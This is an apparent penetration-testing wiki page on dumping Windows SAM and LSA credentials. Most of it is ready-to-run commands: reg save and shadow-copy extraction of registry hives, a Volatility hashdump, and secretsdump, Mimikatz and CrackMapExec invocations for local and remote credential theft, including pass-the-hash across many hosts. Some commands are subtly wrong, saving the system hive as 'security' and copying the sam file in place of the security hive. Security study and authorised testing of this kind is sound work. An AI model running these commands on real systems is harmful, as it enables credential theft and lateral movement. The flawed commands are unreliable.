Local credentials (SAM and LSA)

Overview

SAM (Security Accounts Manager) and LSA (Local Security Authority) are two important databases used in the security architecture of Windows operating systems.

The SAM database is a part of the Windows registry and stores information related to local user accounts and security policies. It contains data such as usernames, passwords (hashed), account status, and group membership. Windows uses SAM to perform local user authentication and enforce security policies on a per-machine basis.

The LSA database, on the other hand, is a component of the Windows security subsystem that provides security-related services to applications and other system components. It stores security-related information such as authentication credentials, security policy settings, and account lockout policies. The LSA database is responsible for enforcing security policies, authenticating users, and managing security tokens for applications and system services.

In summary, while the SAM database is primarily concerned with managing local user accounts and security policies, the LSA database provides a broader range of security-related services and is used by various components of the Windows operating system.

Hive

Details

SAM

Contains local cached credentials.

Security

Stores clear text credentials, password hashes, security tokens etc.

System

Store enough info to decrypt the SAM and LSA hives.

Obtaining the SAM and LSA database

To be able to decrypt the SAM database, we'll require the sam and system hive where the encryption key is stored.

To be able to decrypt the LSA database, we'll require the security and system hive where the encryption key is stored.

reg save HKLM\sam sam
reg save HKLM\system system
reg save HKLM\system security

Creating a shadow copy.

wmic shadowcopy call create Volume='C:\'

List existing shadow copies.

vssadmin list shadows

Copying the SAM database.

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam C:\users\offsec.corp1\Downloads\sam

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system C:\users\offsec.corp1\Downloads\system

Copying the LSA databases.

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam C:\users\offsec.corp1\Downloads\security

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system C:\users\offsec.corp1\Downloads\system

Full memory dump and Volatility

Magnet RAM Capture - Magnet ForensicsMagnet Forensics

Obtain memory dump from Magnet Ram Capture or other forensics tools.

Using volatility to read memory and obtain credentials

Release v1.0.0 · volatilityfoundation/volatility3GitHub

GitHub - volatilityfoundation/volatility3: Volatility 3.0 developmentGitHub

py .\vol.py -f C:\Users\admin\ram_memdump.raw windows.hashdump.HashDump

Decoding the SAM and LSA database

Impacket's secretsdump is a Python tool used for extracting authentication credentials from Windows systems. It can extract password hashes from the Security Account Manager (SAM) database and Kerberos tickets from the Local Security Authority (LSA) database.

# Remote dumping of SAM & LSA secrets
secretsdump.py 'DOMAIN/USER:PASSWORD@TARGET'

# Remote dumping of SAM & LSA secrets (pass-the-hash)
secretsdump.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'

# Remote dumping of SAM & LSA secrets (pass-the-ticket)
secretsdump.py -k 'DOMAIN/USER@TARGET'

# Offline dumping of LSA secrets from exported hives
secretsdump.py -security '/path/to/security.save' -system '/path/to/system.save' LOCAL

# Offline dumping of SAM secrets from exported hives
secretsdump.py -sam '/path/to/sam.save' -system '/path/to/system.save' LOCAL

# Offline dumping of SAM & LSA secrets from exported hives
secretsdump.py -sam '/path/to/sam.save' -security '/path/to/security.save' -system '/path/to/system.save' LOCAL

Mimikatz is a powerful Windows post-exploitation tool that can extract sensitive information such as password hashes, plaintext passwords, and Kerberos tickets from memory on a compromised system.

# Local dumping of SAM secrets on the target
lsadump::sam

# Offline dumping of SAM secrets from exported hives
lsadump::sam /sam:'C:\path\to\sam.save' /system:'C:\path\to\system.save'

# Local dumping of LSA secrets on the target
lsadump::secrets

# Offline dumping LSA secrets from exported hives
lsadump::secrets /security:'C:\path\to\security.save' /system:'C:\path\to\system.save'

CrackMapExec (Python) can be used to remotely dump SAM and LSA secrets, on multiple hosts. It offers several authentication methods like pass-the-hash (NTLM), or pass-the-ticket (Kerberos)

# Remote dumping of SAM/LSA secrets
crackmapexec smb $TARGETS -d $DOMAIN -u $USER -p $PASSWORD --sam/--lsa

# Remote dumping of SAM/LSA secrets (local user authentication)
crackmapexec smb $TARGETS --local-auth -u $USER -p $PASSWORD --sam/--lsa

# Remote dumping of SAM/LSA secrets (pass-the-hash)
crackmapexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash --sam/--lsa

# Remote dumping of SAM/LSA secrets (pass-the-ticket)
crackmapexec smb $TARGETS --kerberos --sam/--lsa

References

SAM & LSA secrets | The Hacker Recipeswww.thehacker.recipes

PreviousWindows credential audit and logon types NextLsass from forensics dump

Last updated 2 years ago

hashtagOverview

hashtagObtaining the SAM and LSA database

hashtagFull memory dump and Volatility

hashtagUsing volatility to read memory and obtain credentials

hashtagDecoding the SAM and LSA database

hashtagReferences